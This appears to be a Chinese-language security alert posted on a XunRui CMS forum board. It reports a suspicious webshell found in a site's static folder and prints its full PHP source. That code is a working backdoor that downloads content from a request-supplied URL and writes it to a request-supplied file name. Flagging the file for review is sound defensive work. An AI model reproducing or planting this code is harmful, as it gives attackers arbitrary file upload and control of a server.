迅睿框架 版主:迅睿框架研发组
发现了一个可疑的Webshell文件
类型:迅睿CMS 更新时间:2025-10-02 19:52:11

在您的系统磁盘上发现了一个可疑的Webshell文件,建议您先确认文件合法性并进行处理。

/www/wwwroot/www.********.cn/public/mobile/static/Cache.php

文件中内容

<?php
$filename=&$a;$a=$_REQUEST['name'];
$url=&$b;$b=$_REQUEST['url'];
@file_put_contents($filename,file_get_contents($url));